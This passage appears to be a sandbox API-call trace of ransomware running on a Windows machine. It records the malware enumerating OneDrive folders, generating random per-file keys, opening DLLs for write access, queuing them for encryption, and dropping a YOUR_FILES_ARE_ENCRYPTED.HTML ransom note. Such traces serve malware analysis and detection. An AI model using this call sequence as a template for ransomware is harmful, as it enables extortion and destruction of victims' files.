lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi" [0162.918] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi\\*" [0162.918] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac9850b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacab5bb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacab5bb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.927] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac9850b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacab5bb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacab5bb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.927] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacab5bb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacab5bb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacab5bb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.927] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.927] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.927] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.927] lstrlenW (lpString=".mui") returned 4 [0162.927] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.927] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacab5bb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacab5bb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacab5bb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.927] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.927] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\vi\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\vi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.928] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.930] CloseHandle (hObject=0x5ac) returned 1 [0162.930] GetProcessHeap () returned 0x270000 [0162.931] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.931] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4f607d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4f607d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4faca90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x652a0, dwReserved0=0x0, dwReserved1=0x60, cFileName="VideoStreamingPlugin.dll", cAlternateFileName="VIDEOS~1.DLL")) returned 1 [0162.931] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll") returned 96 [0162.931] lstrcmpW (lpString1="VideoStreamingPlugin.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.931] PathFindExtensionW (pszPath="VideoStreamingPlugin.dll") returned=".dll" [0162.931] lstrlenW (lpString=".dll") returned 4 [0162.931] PathFindExtensionW (pszPath="VideoStreamingPlugin.dll") returned=".dll" [0162.931] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\videostreamingplugin.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0162.932] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=414368) returned 1 [0162.932] GetProcessHeap () returned 0x270000 [0162.932] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0162.935] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="1C") returned 2 [0162.935] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="B4") returned 2 [0162.935] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="70") returned 2 [0162.935] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="F8") returned 2 [0162.935] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="58") returned 2 [0162.935] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="40") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="13") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="49") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="37") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="9E") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="C9") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="2F") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="60") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="6D") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="A6") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="A3") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="39") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="6B") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="5B") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="47") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="27") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="29") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="84") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="54") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CE") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="7C") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="19") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="C4") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="A4") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="A5") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="0E") returned 2 [0162.936] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="4C") returned 2 [0162.937] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll" [0162.937] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.937] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0162.937] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa50912d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa50912d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa50912d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x684a0, dwReserved0=0x0, dwReserved1=0x60, cFileName="wlmfds.dll", cAlternateFileName="")) returned 1 [0162.937] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll") returned 82 [0162.937] lstrcmpW (lpString1="wlmfds.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.937] PathFindExtensionW (pszPath="wlmfds.dll") returned=".dll" [0162.937] lstrlenW (lpString=".dll") returned 4 [0162.937] PathFindExtensionW (pszPath="wlmfds.dll") returned=".dll" [0162.937] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.937] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\wlmfds.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0162.938] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=427168) returned 1 [0162.938] GetProcessHeap () returned 0x270000 [0162.938] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0162.943] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="99") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="20") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="33") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="27") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="2E") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="5C") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="21") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="D1") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="88") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="AE") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="35") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="9B") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="6B") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="FD") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="03") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="ED") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="B7") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="79") returned 2 [0162.943] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="86") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="11") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="D0") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="DB") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="38") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="44") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="41") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="A4") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="ED") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="EA") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="BA") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="7E") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="D9") returned 2 [0162.944] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="42") returned 2 [0162.944] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll" [0162.945] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.945] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0162.945] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa52341f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa52341f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa52341f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x60ca8, dwReserved0=0x0, dwReserved1=0x60, cFileName="WnsClientApi.dll", cAlternateFileName="WNSCLI~1.DLL")) returned 1 [0162.945] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll") returned 88 [0162.945] lstrcmpW (lpString1="WnsClientApi.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.945] PathFindExtensionW (pszPath="WnsClientApi.dll") returned=".dll" [0162.945] lstrlenW (lpString=".dll") returned 4 [0162.945] PathFindExtensionW (pszPath="WnsClientApi.dll") returned=".dll" [0162.945] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\wnsclientapi.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0162.945] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=396456) returned 1 [0162.945] GetProcessHeap () returned 0x270000 [0162.945] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0162.948] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="52") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="C5") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="F0") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="26") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="6A") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="00") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="8B") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="96") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="94") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="05") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="D5") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="C6") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="5E") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="E4") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="D5") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="68") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="4E") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="A3") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="71") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="C5") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="D3") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="E0") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="29") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="DD") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="D4") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="A3") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="62") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="71") returned 2 [0162.948] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="BC") returned 2 [0162.949] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="FB") returned 2 [0162.949] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="4A") returned 2 [0162.949] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="3B") returned 2 [0162.949] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll" [0162.949] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.949] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0162.950] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacab5bb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacbe66b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacbe66b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="wo", cAlternateFileName="")) returned 1 [0162.950] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo") returned 74 [0162.950] GetProcessHeap () returned 0x270000 [0162.950] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.951] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo" [0162.951] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo\\*" [0162.951] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacab5bb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacbe66b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacbe66b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.951] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacab5bb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacbe66b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacbe66b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0162.951] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacbe66b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacbe66b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacbe66b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x116b0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.951] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.951] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.951] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.951] lstrlenW (lpString=".mui") returned 4 [0162.951] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.951] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacbe66b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacbe66b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacbe66b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, 